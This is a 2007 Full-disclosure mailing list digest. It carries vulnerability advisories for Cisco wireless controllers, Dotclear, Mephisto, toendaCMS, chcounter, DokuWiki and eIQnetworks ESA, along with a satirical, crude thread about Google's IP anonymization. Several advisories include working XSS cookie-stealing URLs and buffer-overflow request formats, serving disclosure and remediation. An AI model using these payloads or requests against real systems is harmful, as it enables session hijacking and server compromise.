  * Cisco Wireless LAN Controller Module

Cisco Aironet Access Points

  * Cisco Aironet 1000 Series
  * Cisco Aironet 1500 Series

Products Confirmed Not Vulnerable
+

  * Cisco Aironet 1400 Series
  * Cisco Aironet 1300 Series
  * Cisco Aironet 1240 AG Series
  * Cisco Aironet 1230 AG Series
  * Cisco Aironet 1200 Series
  * Cisco Aironet 1130 AG Series
  * Cisco Aironet 1100 Series

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access
points using the Lightweight Access Point Protocol (LWAPP). This
protocol provides centralized management of wireless networks. The
WLC contains the following vulnerabilities:

Default SNMP Community Strings
+-

The WLC uses the commonly known values of "public" and "private" for
its read-only and read-write SNMP community strings. This
vulnerability is documented by Cisco Bug ID CSCse02384.

Malformed Ethernet Traffic Crash
+---

The WLC may crash in response to malformed Ethernet traffic. This
vulnerability is documented by Cisco Bug ID CSCsc90179.

Multiple NPU Lock-Up Vulnerabilities
+---

The Network Processing Unit (NPU) is responsible for handling traffic
within the WLC. It is possible to cause one or more NPUs to lock up
by sending certain types of traffic to an affected WLC. This traffic
includes crafted SNAP packets, malformed 802.11 traffic, and packets
with unexpected length values in certain headers.

Each NPU operates independently and serves two of the physical ports
on the WLC. A lock up in one NPU does not affect the others, so the
number of NPUs available and the configuration of the device
determine whether these vulnerabilities result in a partial or
complete inability to forward traffic. To clear an NPU lock-up, the
WLC must be restarted. If the lock up condition prevents access to
the management interface, the restart must be performed via the
console port or service port.

Devices that implement the WLC functionality in software rather than
hardware do not contain an NPU and are not affected by these
vulnerabilities. These software-based devices are the 2000 Series
WLC, the 2100 Series WLC, and the Cisco Wireless LAN Controller
Module.

These vulnerabilities are documented by Cisco Bug IDs CSCsg36361,
CSCsg15901, and CSCsh10841.

Hard-Coded Service Password in Lightweight AP
+

The Cisco Aironet 1000 Series and 1500 Series Lightweight Access
Points contain a hard-coded service password that is used for
troubleshooting. This service account is only acc

Re: [Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread jt5944-27a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[EMAIL PROTECTED] wrote:
> [EMAIL PROTECTED] wrote:
> > information that can be derived from an IP address.) I doubt
that
> > Google is a private company that generates revenue off of their
> > targeted advertising expertise, and there is absolutely no
> > legitimate value in this information to anyone. While it is
> > acceptable to ignorantly profile based on ethnicity and
> > nationality, it is not acceptable to analyze marketing
statistics
> > based on geographic location. No good can come from this!
> >
> Yawn, yawn and more yawn. Google is a publicly traded company.

n3td3v - you're losing your humor. the original posting at
http://www.hackerfactor.com/blog/index.php?/archives/22-Lets-Help-
Google.html is at least vaguely interesting.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYeXGoACgkQiDw0BWMaDTF2dgP+IMlGrFY9HlAZWMR4BiAHGlAsdZwX
l3+/PMR8osCn/mObF4yNU+sDIMpiva2Jk9OQ2etBZ9fI3b/0e/Q+vi9jzAf3oWBYmP+r
3ihq7Qb/b8vmeXg+XpOBixi9Cfnh71F23htLaRU1PWZcFkMqVJ3dhh/7ZGlsRvNy0yEp
Uq1y2ZY=
=mqdM
-END PGP SIGNATURE-





[Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability

2007-04-12 Thread nssimo nssimo

Dotclear 1.*  Cross Site Scripting Vulnerability


1- Two cross-site scripting vulnerabilities have been discovered in
dotclear 1.*, allowing remote attackers to hijack authenticated sessions.
Workaround:
$post_id (trackback.php)
$tool_url(/tools/thememng/index.php)
are not filtered
2-Proof of Concepts:
dotclear/ecrire/trackback.php?post_id=">alert(document.cookie
);

/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng


3-Disclosure timeline
05/04/2007   dotclear team contacted
10/04/2007  fixed

4-solution:
upgrade to dotclear 1.2.6
http://www.dotclear.net/

found by nassim
http://www.securlabs.com/

[Full-disclosure] INFIGO-2007-04-05: Enterprise Security Analyzer server remote buffer overflows

2007-04-12 Thread infocus


   INFIGO IS Security Advisory #ADV-2007-04-01
  http://www.infigo.hr/



Title: Enterprise Security Analyzer server remote buffer overflows
Advisory ID: INFIGO-2007-08
Date: 2007-04-05
Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04
Impact: Remote code execution (preauth)
Risk Level: High
Vulnerability Type: Remote
Vendors Status: Vendor contacted 8.2.2007 (first contact),
Vendor contacted 19.2.2007 (second contact),
Vendor contacted 28.3.2007 (no response)






==[ Overview

Enterprise Security Analyzer (ESA) from eIQnetworks  
(http://www.eIQnetworks.com)
is a Security Information Management (SIM) solution that provides security
intelligence across the enterprise. ESA helps to simplify operations, protect
IT assets and meet compliance mandates by combining multiple functionalities
into a single solution.



==[ Vulnerability

During an audit of Enterprise Security Analyzer, multiple remote buffer
overflows have been discovered in the ESA server (TCP port 10616).
There are various stack and heap overflows in multiple ESA requests.
The ESA protocol is a very simple plaintext, home-grown protocol in which
requests are sent in the following form:

---
[REQUEST_COMMAND]&[ARG1]&[ARG2]&[ARG3]&[ARGn]
---
(Note: remove '[' and ']')

Ironically, Enterprise Security Analyzer is affected by various
'by the book' overflows in multiple request commands as listed below:

- DELETESEARCHFOLDER stack overflow
Request: [DELETESEARCHFOLDER&A x 4...&]

- DELTASK heap overflow
Request: [DELTASK&A x 3000...&current&test&]

- HMGR_CHECKHOSTSCSV heap overflow
Request: [ HMGR_CHECKHOSTSCSV&A x 8...&]

- TASKUPDATEDUSER heap overflow
Request: [TASKUPDATEDUSER&A x 6...&test&test&]

- VERIFYUSERKEY remote memory access violation
Request: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]

- VERIFYPWD remote stack overflow (low risk - admin password needed)
Request: [VERIFYPWD&A x 6000...&admin&adminpass&]



==[ Affected Version

The vulnerability has been identified in the latest available Enterprise
Security Analyzer v2.5. Previous versions are believed to be vulnerable
as well.



==[ Fix

No patch provided.



==[ PoC Exploit

Not needed.



==[ Credits

Vulnerability discovered by Leon Juranic <[EMAIL PROTECTED]>.



==[ INFIGO IS Security Contact

INFIGO IS,

WWW : http://www.infigo.hr
E-mail : [EMAIL PROTECTED]




[Full-disclosure] A Botted Fortune 500 a Day

2007-04-12 Thread Gadi Evron
Support Intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

You can find more information on their blog:
http://blog.support-intelligence.com/

They are good people, and they know botnets.

Gadi.



[Full-disclosure] Cross site scripting in mephisto 0.7.3

2007-04-12 Thread Hanno Böck
Cross site scripting in mephisto 0.7.3

security advisory

References:
 http://www.mephistoblog.com
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1873

Description:
 Cross-site scripting describes attacks that allow an attacker to insert
 malicious HTML or JavaScript code via GET or POST forms. This can be used
 to steal session cookies.
 mephisto is a Rails-based blog application. The search function can be
 used to inject JavaScript code.

Workaround/Fix:
 There's no vendor fix.
 Vendor has been contacted 2007-03-10 and replied that they were working on
 the issue.

Sample injection URL:
 http://demo.mephistoblog.com/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

CVE Information:
 The Common Vulnerabilities and Exposures (CVE) project has assigned the
 name CVE-2007-1873 to this issue. This is a candidate for inclusion in
 the CVE list (http://cve.mitre.org/), which standardizes names for
 security problems.

Credits and copyright:
 This vulnerability was discovered by Hanno Boeck of schokokeks.org
 webhosting.
 It's licensed creative commons attribution:
 http://creativecommons.org/licenses/by/3.0/

 Hanno Boeck, 2007-04-12, http://www.hboeck.de



[Full-disclosure] CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

2007-04-12 Thread Hanno Böck
Cross site scripting in toendaCMS 1.5.3

security advisory

References:
 http://www.toendacms.com/
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1872

Description:
 Cross-site scripting describes attacks that allow an attacker to insert
 malicious HTML or JavaScript code via GET or POST forms. This can be used
 to steal session cookies.
 toendacms is a content management system. The search function can be
 used to inject JavaScript code.

Workaround/Fix:
 There's no vendor fix.
 Vendor has been contacted 2007-03-11 and replied that they were working on
 the issue.

Sample Code:
 http://toendainstallation/"; method="post">
 
 
 

CVE Information:
 The Common Vulnerabilities and Exposures (CVE) project has assigned the
 name CVE-2007-1872 to this issue. This is a candidate for inclusion in
 the CVE list (http://cve.mitre.org/), which standardizes names for
 security problems.

Credits and copyright:
 This vulnerability was discovered by Hanno Boeck of schokokeks.org
 webhosting.
 It's licensed creative commons attribution:
 http://creativecommons.org/licenses/by/3.0/

 Hanno Boeck, 2007-04-12, http://www.hboeck.de



[Full-disclosure] CVE-2007-1871: Cross site scripting in chcounter 3.1.3

2007-04-12 Thread Hanno Böck
Cross site scripting in chcounter 3.1.3

security advisory

References:
 http://chcounter.org/
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1871

Description:
 Cross-site scripting describes attacks that allow an attacker to insert
 malicious HTML or JavaScript code via GET or POST forms. This can be used
 to steal session cookies.
 chcounter is a free-software PHP script for website statistics. The
 login form on the start page can be used to insert JavaScript code.

Workaround/Fix:
 There's no vendor fix.
 Vendor has been contacted 2007-03-11 and has not answered yet.

Sample Code:
 http://chcounterinstallation/stats/>
 
 
 

CVE Information:
 The Common Vulnerabilities and Exposures (CVE) project has assigned the
 name CVE-2007-1871 to this issue. This is a candidate for inclusion in
 the CVE list (http://cve.mitre.org/), which standardizes names for
 security problems.

Credits and copyright:
 This vulnerability was discovered by Hanno Boeck of schokokeks.org
 webhosting.
 It's licensed creative commons attribution:
 http://creativecommons.org/licenses/by/3.0/

 Hanno Boeck, 2007-04-12, www.hboeck.de



[Full-disclosure] [ GLSA 200704-08 ] DokuWiki: Cross-site scripting vulnerability

2007-04-12 Thread Matthias Geerdsen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: DokuWiki: Cross-site scripting vulnerability
  Date: April 12, 2007
  Bugs: #163781
ID: 200704-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


DokuWiki is vulnerable to a cross-site scripting attack.

Background
==

DokuWiki is a simple to use wiki aimed at creating documentation.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  www-apps/dokuwiki < 20061106  >= 20061106

Description
===

DokuWiki does not sanitize user input to the GET variable 'media' in
the fetch.php file.

Impact
==

An attacker could entice a user to click a specially crafted link and
inject CRLF characters into the variable. This would allow the creation
of new lines or fields in the returned HTTP Response header, which
would permit the attacker to execute arbitrary scripts in the context
of the user's browser.

Workaround
==

Replace the following line in lib/exe/fetch.php:
$MEDIA = getID('media',false); // no cleaning - maybe external

with
$MEDIA = preg_replace('/[\x00-\x1F]+/s','',getID('media',false));

Resolution
==

All DokuWiki users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20061106"

References
==

  [ 1 ] CVE-2006-6965
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6965

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux, and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED]; alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread James Matthews

Yah yah people will still use it!

On 4/12/07, J. Oquendo <[EMAIL PROTECTED]> wrote:


[EMAIL PROTECTED] wrote:
> information that can be derived from an IP address.) I doubt that
> Google is a private company that generates revenue off of their
> targeted advertising expertise, and there is absolutely no
> legitimate value in this information to anyone. While it is
> acceptable to ignorantly profile based on ethnicity and
> nationality, it is not acceptable to analyze marketing statistics
> based on geographic location. No good can come from this!
>
Yawn, yawn and more yawn. Google is a publicly traded company.

Your comments about targeted advertising based on geographic
locations are wrong. If you own a ski supply company, what
purpose would it serve to have ads dished out to people in
I don't know say Las Vegas or Miami.

As for the rest of this rambling... Old and inaccurate news.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams






--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

Re: [Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

information that can be derived from an IP address.) I doubt that
Google is a private company that generates revenue off of their
targeted advertising expertise, and there is absolutely no
legitimate value in this information to anyone. While it is
acceptable to ignorantly profile based on ethnicity and
nationality, it is not acceptable to analyze marketing statistics
based on geographic location. No good can come from this!


Yawn, yawn and more yawn. Google is a publicly traded company.

Your comments about targeted advertising based on geographic
locations are wrong. If you own a ski supply company, what
purpose would it serve to have ads dished out to people in
I don't know say Las Vegas or Miami.

As for the rest of this rambling... Old and inaccurate news.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams



[Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread neal.krawetz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

For more than a decade, privacy advocates have been concerned about
the information collected by public search engines. All of their
concerns were realized last year, when AOL released nearly a
quarter million search requests performed on their search engine.
Although the data did not have IP addresses or user names, it did
contain AOL tracking numbers. These allow people to match queries
to users, and in many cases, identify individuals.

Although AOL quickly removed the data, their reaction was too late.
The data has been mirrored and is widely available.

It seems that Google has begun to respond to privacy concerns. One
common belief is that Google has saved every query from every IP
address ever made on their massive system. In the official Google
blog, they mentioned taking some steps to protect individual's
privacy. As reported by Network World magazine:

Google will alter cookie information and change the last eight
bits of the 32-bit IP addresses that identify computers logged onto
the company's search engine.

Wow... So they will reduce the identity from one IP address to a
possible 256 IP addresses. Gee, that sounds secure to
me. Considering that IP addresses can be used to identify
a very specific region, and that all 256 possible addresses are
likely in the same part of the same city, identifying individuals
would actually be easier with Google's data than with AOL's data!
(AOL only gave a unique tracking number, not the country or city
information that can be derived from an IP address.)  I doubt that
Google is a private company that generates revenue off of their
targeted advertising expertise, and there is absolutely no
legitimate value in this information to anyone.  While it is
acceptable to ignorantly profile based on ethnicity and
nationality, it is not acceptable to analyze marketing statistics
based on geographic location.  No good can come from this!

I am a huge privacy advocate, and strongly encourage readers of
this article to start using The Electronic Frontier Foundation's
TOR for anonymity's sake, to prevent evil corporations like Google
from generating revenue off their otherwise free service to you,
the casual netizen.  However, please do not use TOR to read my
blog! I must know the location of each blog reader, since I am such
a huge Internet privacy advocate!  :-)
]
Adding to the humor of this less-than-secure solution, Google's
blog says:

Our engineers are already busy working out the technical
details, and we hope to implement this new data policy over the
coming months (and within a year's time).


I think we should help Google solve this problem. Which do you
think is more secure?

* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x
* 192.168.15.xx
* 192.168.15.xxx
* 192.168.15.
* 192.168.15.x

or, perhaps:

* 192.168.15.abcdefghijklmnopqrstuvwxyz ?

Send your fecal excretions to Privacy Matters, c/o Google Inc.,
1600 Amphitheatre Parkway, Mountain View, California, 94043, USA.

And remember, "Do No Evil" is not the same as "Don't Act Stupid",
and certainly not the same as "Don't Fuck Fat Chicks".

- - ^d0c_n34l^ [HFG/gH/ILF/ACiD/MoD/TaMU]
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYeLPoACgkQDpFP8dW5K4awwQP/c5ILaIBKHPwwneiL/tk+YUYTQWUI
rRhpqExWxGZnfYwBG8eZRoKgIZSr6f+KaiFaT5cGFJ57PfXq2o3yqm0c5af5Z8K5Ch/w
GfGUjAmyhq23eoI9BjyKGPlXsAgu57wBhy+kkZdpjLov9EHl/FeOQ2X3kIOtsqKJ7spI
PL1r3Ts=
=0UgV
-END PGP SIGNATURE-


